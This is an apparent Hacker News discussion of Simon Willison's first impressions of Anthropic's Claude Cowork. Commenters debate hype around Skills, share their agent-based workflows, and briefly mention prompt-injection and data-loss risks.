First impressions of Claude Cowork

First thing I did here is a grep for "Skills" and no hits. Simon's posts are well upvoted here and Anthropic/Claude is a bit of HN darling, but I think they are playing the hype game a bit too well here.

3 months ago, Anthropic and Simon claimed that Skills were the next big thing and going to completely change the game. So far, from my exploration, I don't see any good examples out there, nor is a there a big growing/active community of users.

Today, we are talking about Cowork. My prediction is that 3 months from now, there will be yet another new Anthropic positioning, followed up with a detailed blog from Simon, followed by HN discussing possibilities. Rinse and Repeat.

This is something I have experienced first hand participating in the Vim/Emacs/Ricing communities. The newbie spends hours installing and tuning workflows with the mental justification of long-term savings, only to throw it all away in a few weeks when they see a new, shinier thing. I have been there and done that. For many, many years.

The mature user configures and installs 1 or 2 shiny new things, possibly spending several hours even. Then he goes back to work. 6 months later, he reviews his workflow and decides what has worked well, what hasn't and looks for the new shiny things in the market. Because, you need to use your tools in anger, in the ups and downs, to truly evaluate them in various real scenarios. Scenarios that won't show up until serious use.

My point is that Anthropic is incentivized in continuously moving goalposts. Simon is incentivized in writing new blogs every other day. But none of that is healthy for you and me.

> Look at my drafts that were started within the last three months and then check that I didn’t publish them on simonwillison.net using a search against content on that site and then suggest the ones that are most close to being ready

This is a very detailed, particular prompt. The type of prompt a programmer would think of as they were trying to break down a task into something that can be implemented. It is so programmer-brained that I come away not convinced that a typical user would be able to write it.

This isn’t an AI skepticism post - the fact that it handles the prompt well is very impressive. But I’m skeptical that the target user is thinking clearly enough to prompt this well.

I enjoyed hearing Claude Code creator Boris Cherny talk about "latent demand"[0], which is when users start using your product for something it was not intended for. When that happens, it's a great signal that you should go build that into a full product.

Cowork seems like a great application of that principle.

[0] https://www.youtube.com/watch?v=AmdLVWMdjOk

This is my Substack newsletter which bundles several posts together into a weekly-ish email - the original post for this one was https://simonwillison.net/2026/Jan/12/claude-cowork/

I don’t think I’ve ever seen this guy say anything negative about an AI product, which makes me skeptical of his insights here.

This is a nice technical account that we're used to seeing from Simon.

I get a kick out of the fact that Microsoft has been preciously clinging to the "Copilot" branding and here comes Claude coming saying "Cowork? Good enough for us!".

Taking a step back, I really would love to see a broader perspective -- an account of someone who is not tech savvy at all. Someone who works a basic desk job that requires basic competency of microsoft word. I'm so deep into the bubble of AI-adjacent people that I haven't taken stock of how this would or could empower those who are under-skilled.

We've taken it as truth that those who benefit most from AI are high-skilled augmenters, but do others see some lift from it? I'd love if anthropic tried to strap some barely-performing administrative assistants into these harnesses and see if there's a net benefit. For all I know, it's not inconceivable that there be a `rm -rf` catastrophe every other hour.

I worry this is gonna cause even more sensitive/privilaged data extrafiltration than currently is happening. And most “normies” won't even notice.

I know the counterargument is people are already putting in company data via ChatGPT. However, that is a conscious decision. This may happen without people even recognizing that they are “spilling the beans”.

I just used Claude Code to do something that would have taken my wife 3+ days

She has to go through about 100 resumes for a position at her college. Each resume is essentially a form the candidate filled out and lists their detailed academic scores from high school > PhD, their work experience, research and publications.

Based on the declared data, candidates are scored by the system

Now this is India and there's a decent amount of fraud, so an individual has to manually check the claimed experience/scores/publications against reality

A candidate might claim to have relevant experience, but the college might be unaccredited, or the claimed salary might be way too low for a relevant academic position. Or they might claim to have published in XYZ journal, but the journal itself might be a fraudulent pay-to-publish thing

Going through 100+ resumes, each 4 pages long is a nightmare of a task. And boring too.

So I asked Claude Code to figure out the problem. I gave it a PDF with the scoring guidelines, a sample resume, and asked it to figure out the problem

Without me telling it, it figured out a plan that involved checking a college's accredition and rating (the govt maintains a rating for all colleges), the claimed salary vs actual median salary for that position (too low is a red flag), and whether the claimed publication is in either the SCOPUS index or a govt approved publications index

(I emphasize govt approved because this is in a govt backed institution)

Then I gave it access to a folder with all the 100 resumes.

In less than 30 minutes, it evaluated all candidates and added the evaluation to a CSV file. I asked it to make it more readable, so it made a HTML page with data from all the candidates and red/green/yellow flags about their work-experience, publications, and employment

It made a prioritized list of the most promising candidates based on this data

My wife double checked because she still "doesn't trust AI", but all her verification almost 100% matched Claude's conclusions

This was a 3 day, grinding task done in 30 minutes. And all I did was type into a terminal for 20 minutes

In general, I think when we are evaluating fuzzy things like this we should come up with specifications for what we would like to see before performing the eval. Not saying it happened here, but very often I see people impressed with “answer-shaped” answers rather than objectively assessing the actual quality. The latter is harder and requires specific expertise.

It is probably a good lesson on how far confidence can get you in life. People are often highly biased by the presentation of the thing.

Leveraging Claude Code in a Linux shell to do all sorts of stuff has been an amazing superpower for me, and I think for many others. Cowork is a promising next step to democratize this superpower for others.

If Microsoft, in creating their next gen agentic OS, wants to replace Windows with the Linux kernal, Claude Code, and bash shell (turning Windows into a distribution of sorts,) more power to them. However, I doubt this is the direction they'll go.

I'm not convinced that the success and momentum of Claude Code will catch on with the general public. This feels like the one trick pony that's been groomed and billed as a racehorse. Or put another way Claude Cowork feels like Claude Code for people who don't code and are not interested in vibe coding.

We'll see.

I think Claude Cowork should come with a requirement or a very heavily structured wizard process to ensure the machine has something like a Time Machine backup or other backups that are done regularly, before it is used by folks.

The failure modes are just too rough for most people to think about until it's too late.

i propose the following benchmark task that i think can serve as a baseline of whether these local automation systems can really save time:

starting with a bare ubuntu desktop system with plenty of RAM and CPU, setup three ubuntu VMs for secure development and networking skills learning (wireshark, protocol analysis, etc etc):

one ubuntu “virtual” desktop to simulate a working desktop that an end-user or developer would use. its networking should initially be completely isolated.

one ubuntu server to simulate a bastion machine. route all “virtual desktop” traffic through this “bastion”. it will serve as a tap.

one ubuntu server to serve as edge node. this one can share internet access with the host. route all bastion traffic through the edge node.

use this three vm setup to perform ordinary tasks in the “virtual desktop “ and observe the resulting traffic in the “bastion”. verify that no other traffic is generated on or from the host outside of the expected path virtual desktop -> bastion -> edge.

i claim this is a minimal “network clean” development setup for anyone wanting to do security-conscious development.

extra credit: setup another isolated vm sever to act as the package manager ; ie mirror anything to be installed on the “virtual desktop” onto this package server and configure this server as the install point for apt on the “virtual desktop”.

i doubt an AI can set this up right now. (i’ve tried)

This is some low hanging fruit that keeps getting driven by in order to speed up development. There is so so much potential here. If this can replace the RPS consulting industry I won't be unhappy. Let individuals do it themselves so they have time to work themselves into some other position or move up/take on more responsibility.

I've built several bespoke "apps" that are essentially Claude Code + a folder with files in it. For example, I have Claude Coach, which designs ultimate frisbee workouts for me. We started with a few Markdown files—one with my goals, one with information about my schedule, another with information about the equipment and facilities I have access to, and so on. It would access those files and use them to create my weekly workout plans, which were also saved as files under the same folder.

Over time this has become more sophisticated. I've created custom commands to incorporate training tips from YouTube videos (via YT-DLP and WhisperX) and PDFs of exercise plans or books that I've purchased. I've used or created MCP servers to give it access to data from my smart watch and smart scale. It has a few database-like YAML files for scoring things like exercise weight ranges and historical fitness metrics. At some point we'll probably start publishing the workouts online somewhere where I can view and complete them electronically, although I'm not feeling a big rush on that. I can work on this at my own pace and it's never been anything but fun.

I think there's a whole category of personal apps that are essentially AI + a folder with files in it. They are designed and maintained by you, can be exactly what you want (or at least can prompt), and don't need to be published or shared with anyone else. But to create them you needed to be comfortable at the command line. I actually had a chat with Claude about this, asking if there was a similar workflow for non-CLI types. Claude Cowork seems like it. I'll be curious to see what kinds of things non-technical users get up to with it, at least once it's more widely available.

One rough edge for me: the cowork interface seems to have turned off “extensions” - my first ask was to read some emails and compare with some local documents and draft a document. It kept trying to use claude chrome to navigate to gmail.

I’m not sure what the plan for integrating extensions is here but they definitely will be wanted.

I’m too dumb/lazy to run find and think for myself, so I’m happily digging my own grave. Yipee!!!

My imagination may be lacking, but what would you realistically use a tool like this for?

just in case anyone is interested, I will mention my MIT licensed project that is very useful with Claude https://github.com/runvnc/mindroot

Did this AI hype thot move to substack to try and monetize?

So when can an AI call up the cable company and negotiate a discount? Asking for a friend.

But seriously, other tasks I've encountered recently that I wish I could delegate to an AI:

- Posting my junk to Craigslist, determining a fair price, negotiating a buyer (pickup only!)

- Scheduling showings to find an apartment, wherein the listing agents are spread over multiple platforms, proprietary websites, or phone contacts

- Job applications -- not forging a resume, but compiling candidate positions with reasoning, and the tedious part were you have to re-enter your whole resume into their proprietary application pipeline app

What strikes me as basic similarities across these types of things, is that they are essentially data-entry jobs which interact with third-party interfaces, with CRM-like follow up requirements, and require "good judgement" (reading reviews, identifying scams, etc).

Interesting writeup. I think tools like claude cowork are an interesting hack to adapt agentic coding tools for business use. If you put the security issues aside (and there are significant pitfalls and risks here) and balance the risk against the value add, there's a strong argument to be made for the kind of tradeoffs that Simon is knowingly making here. And given he actually coined the notion of prompt injection, he is of course not ignorant of those risks. That's not dismissing those risks but balancing the risks against the cost of doing things manually. Making progress on addressing these risks is going to be a massive challenge. But there's a lot of short term value if you are not that risk averse as well. That's why codex and claude code have slightly scary command line flags that are widely used. The --yolo flag in codex is a big wink at this topic. "You know you shouldn't but YOLO."

More broadly, my observation is that the type of tools that developers use are naturally suited to be scripted. Because developers do that all the time. We work with command line prompts, lots of tools that can be scripted via the command line, and scripting languages that work in that environment.

Tools like Claude Code and Codex are extremely simple for that reason. It's a simple feedback loop that in pseudo code reads like "while criteria not met, figure out what tools to run, run those, add output to context and re-assess if criteria were met". You don't need to hard code anything about the tools. A handful of tools (read file, run command, etc.) is all that is needed. You can get some very sophisticated feedback loops going that effectively counter the traditional limitations of LLMs (hallucinating stuff, poor instruction following, assertively claiming something is done when it isn't, etc.). A simple test suite and the condition that the tests must pass (while disallowing obvious hacks like disabling all the tests) can be enough to make agents grind away at a problem until it is solved.

In a business context, this is not true yet. Most business users use a variety of tools that aren't very scriptable and require fiddling with complex UIs. Worse, a lot of those tools are proprietary and hacking them requires access you typically don't get or is very limited. Given that, a life hack is to translate business workflows into developer tool workflows and then use agentic coding tools. Claude can't use MS Word for you. But it can probably work on MS word files via open source libraries and tools. So, step zero is to "mount a directory" and then use command line tools to manipulate what's inside. You bypass the tool boundary by swapping out business tools with developer tools. Anything behind a SAAS web UI is a bit out of scope unfortunately. You get bogged down in a complex maze of authentication and permission issues, fiddly APIs with poor documentation. That's why most of the connectors for e.g. Chat GPT are a bad joke in how limited they are.

Simple example. Codex/Claude Code, etc. are probably fairly useless doing anything complicated with say Square Space, a wordpress website, etc. But if you use a static site builder, you can make these tools do fairly complicated things. I've been working for the last two weeks on our Hugo website to do some major modernization, restructuring, content generation, translations, etc. All via prompting codex. I'm working on SEO, lighthouse performance, adding complex new components to the website, reusing content from old pages to create new ones, checking consistency between translations, ensuring consistent use of certain language, etc. All by prompting codex. "Add a logo for company X", "make sure page foo has a translation consistent with my translation guide", etc.

I got a lot more productive with this setup after I added a simple npm run verify test suite with a simple AGENTS.md instruction that the verify script has to pass after any change. If you watch what codex does there's a pattern of trial and error until the verification script passes. Usually it doesn't get it right in one go. But it gets there without my intervention. It's not a very sophisticated test suite but it tests a few of the basics (e.g. tailwind styling survives the build and is in the live site, important shit doesn't 404, hugo doesn't error, etc.). I have about 10 simple smoke tests like that.

I think we'll see a big shift in the business world towards more AI friendly tooling because smart business users will be flocking towards tools that work with AI tools in a hurry as they discover that they can shave weeks/days of grinding those tools manually by switching. This is a process that's likely to take very long because people don't like to change their tool habits. But the notion of what is the right tool for the right job is shifting. If it's not AI friendly, it's the wrong tool probably.

Long term, I expect UIs and dealing with permissions in a sane way will be easier to deal with for AI tools. But meanwhile, we don't actually have to wait for all that. You can hack your way to success if you are a bit smart with your tool choices.

My point is that Anthropic is incentivized in continuously moving goalposts. Simon is incentivized in writing new blogs every other day. But none of that is healthy for you and me.

I think I made good call on Skills.

They were only announced in October and they've already been ported to Codex and Gemini CLI and VS Code agents and ChatGPT itself (albeit still not publicly acknowledged there by OpenAI). They're also used in Cowork and are part of the internals in Fly's new Sprites. They're doing extremely well for an idea that's only three months old!

This particular post on Cowork isn't some of my best work - it was a first impression I posted within a couple of hours of release (I didn't have preview access to Cowork) just to try and explain what the thing was to people who don't have a $100+/month Claude Max subscription.

I don't think it's "unhealthy" for me to post things like this though! Did you see better coverage of Cowork than mine on day one?

I really disagree, skills are really quite useful and there is a lot of usage + community - e.g. take a look at https://github.com/obra/superpowers which I know is used by a lot of people to smooth out their workflow with Claude with great results (not forced spec driven development just better context use + better results). Just this week I used skills to help encapsulate a way to document legacy services ahead of a rewrite (given that my experience now is that rewriting becomes a valid path vs refactoring in many instances): https://github.com/cliftonc/unwind.

I'm happy to bet with that skills -- or "a set of instructions in markdown that get sucked into your context under certain conditions" will stick around. Similarly, I think that the Claude Code/Cowork -- or "interactive prompt using shell commands on a local filesystem" -- will also stick around.

I fully anticipate there being a fair amount of thrashing on what exactly the right wrapper is around both of those concepts. I think the hard thing is to discriminate between the learned constants (vim/emacs) are from the attempts to re-jiggle or extend that (plugins, etc); it's actually useful to get reviews of these experiments exactly so you don't have to install all of them to find out whether they add anything.

(On skills, I think that the reason why there "aren't good examples out there" is because most people just have a stack of impromptu local setups. It takes a bit of work to extract those to throw them out into the public, and right now it's difficult to see that kind of activity over lots of very-excitable hyping, as you rightly describe.

The deal with skills and other piles of markdown is that they don't look, even from a short distance, like you can construct a business model for them, so I think they may well end up in the world of genuine open source sharing, which is a much smaller, but saner, place.

Yep, lots of bike shedding right now.

To be fair, Cowork and similar things are just trying to take the agentic workflows and tools that developers are already accessing (eg most of us have already been working with files in Cursor/CC/Codex for a long time now, it's nothing new) and making them friendly for others.

> 3 months ago, Anthropic and Simon claimed that Skills were the next big thing and going to completely change the game. So far, from my exploration, I don't see any good examples out there, nor is a there a big growing/active community of users.

Skills have become widely adopted since Anthropic's announcement. They've been implemented across major coding agents[0][1][2] and standardized as a spec[3]. I'm not sure what you mean by "next big thing" but they're certainly superior to MCP in ways, being much easier to implement and reducing context usage by being discoverable, hence their rapid adoption

I don't know if skills will necessarily stay relevant amongst evolution of the rest of the tooling and patterns. But that's more because of huge capital investment around everything touching AI, very active research, and actual improvements in the state of the art, rather than simply "new, shinier things" for the sake of it

[0]. https://developers.openai.com/codex/skills/

[1]. https://antigravity.google/docs/skills

[2]. https://cursor.com/blog/dynamic-context-discovery

[3]. https://agentskills.io/home

Cowork actually uses skills under the hood that give it various knowledge work abilities, so that abstraction seems to be working well:

"in Cowork we’ve added an initial set of skills that improve Claude’s ability to create documents, presentations, and other files" https://claude.com/blog/cowork-research-preview

>I don't see any good [skills] examples out there

`/plugin marketplace add anthropics/skills`

https://github.com/anthropics/skills

2 days ago I built a skill to automate a manual workflow I was using: After Claude writes and commits some code, have Codex review that code and have Claude go back and address what Codex finds. I used this process to implement a fairly complete Docusign-like service, and it did a startlingly good job right out of the gate, the bugs were fairly shallow. In my manual review of the Codex findings, it seems to be producing good results.

Claude Code largely built that skill for me.

Implemented as a skill and I've been using it for the last 2 days to implement a "retrospective meeting runner" web app. Having it as a skill completely automates the code->review->rework step.

I partially agree with you that things get abandoned by users when they are too complex, but I think skills are a big improvement compared to what we had before.

Skills + tool search tool (dynamic MCP loading) announced recently are way better than just using MCP tools. I see more adoption by the people around me compared to a few months ago.

Anthropic has great marketing. They get shit (and I do mean shit) to stick in a way that I don't think anyone else in the AI space could. MCP and skills were both obvious duds to people who understand the tech.

Simon is more influencer than engineer at this point, he's incentivized to ride waves to drive views, and I think the handwaiving "this will be amazing" posts have been good to him, even if they turn out to be completely wrong.

I'm not really sure I understand this critique. Skills and cowork are not mutually exclusive. It sits in a gap between Chat and Claude Code.

In regular Chat, I struggle to get the agent to consistently traverse certain workflows that I have. This is something that I can trivially do in Claude Code - but Claude Code wants to code (so I'm often fighting it's tendencies).

Cowork seems like it's going to allow me to use the best parts of Claude Code, without being forced to output everything to code.

I think I made good call on Skills.

I don't think it's "unhealthy" for me to post things like this though! Did you see better coverage of Cowork than mine on day one?

> But none of that is healthy for you and me.

I read that as it's not healthy to constantly follow the day one posts about every iteration of brand new technology in order to try and see how to incorporate it into your workflow in a rapidly evolving manner.

It's not an attack on your article or your habits, it's an accurate indictment of chronically consuming probably short-lived hype instead of practicing craft and the use of hardened tools, much like watching certain programmers on youtube to know about the latest frontend library instead of just working on something with versatile, generalizable, industry-relevant tools

You made the right call. Skills were added to Antigravity and I immediately started creating and using them. I never used custom MCP servers, but skills were immediately obvious to me.

An example: I made a report_polisher skill that cleans some markdown formatting, check image links, and then uses pandoc to convert it to HTML. I ask the tool itself created the skill, then I just tweaked it.

@brailsafe has accurately captured where I am coming from.

I want more blogs/discussion from the community about the existing tools.

In 3/6 months, how many skills have you written? How many times have you used each skill? Did you have edit skills later due to unseen corner cases, or did they generalize? Are skills being used predominantly at the individual level, or are entire teams/orgs able to use a skill as is? What are the usecases where skills are not good at? What are the shortcomings?

(You being the metaphorical HN reader here of course.)

HN has always been a place of greater technical depth than other internet sites and I would like to see more of this sort of thing on the front page along with day one calls.

You did make a good call on skills.

Anything that lets us compose smaller tasks into larger ones effectively is helpful. That’s because self-attention (ie context) is still a huge limiting factor.

As someone who uses these tools a lot, and who sits on the bleeding edge everyday, I agree with you.

MCP got a ton of use out of the gate. People were fawning over it for the first few months, and we can see how well that hype survived contact with hardcore engineers.

There was a funny YouTube which came out immediately after the release where Claude rm -rf all dude's files o_O

https://www.youtube.com/watch?v=_6C9nMvQsGU

YOLO? More like LOLOL

It is probably a good lesson on how far confidence can get you in life. People are often highly biased by the presentation of the thing.

This is my Substack newsletter which bundles several posts together into a weekly-ish email - the original post for this one was https://simonwillison.net/2026/Jan/12/claude-cowork/

I don’t think I’ve ever seen this guy say anything negative about an AI product, which makes me skeptical of his insights here.

He's a proponent, but that doesn't mean his analysis isn't useful. It's clear and mostly accurate and when he gets something wrong he makes it right. Does he do all that with rose tinted glasses, probably, but my experience reading him is that he's sharp, thoughtful, and entirely reasonable.

Dismissing the opportunity to learn because the person offering you knowledge is enthusiastic about his area of expertise is probably shortsighted.

Have you seen my writing on prompt injection (a term that I coined)?

That's pretty negative! https://simonwillison.net/series/prompt-injection/

There's a whole section in the linked piece about how Cowork doesn't do enough here, including:

> I do not think it is fair to tell regular non-programmer users to watch out for “suspicious actions that may indicate prompt injection”

I would argue the EXACT opposite. His analysis is very constructive.

The people you should be skeptical of are the random Xitter handles who post about a robotic phlebotomists and say "THE FUTUE IS ALREADY HERE".

id imagine someone like Simon to pick his AI products carefully enough that he doesn't waste his time on duds.

He literally brings up a concern he calls the "lethal trifecta" when it's even remotely relevant.

You're right to be skeptical. He makes a living as a hype merchant.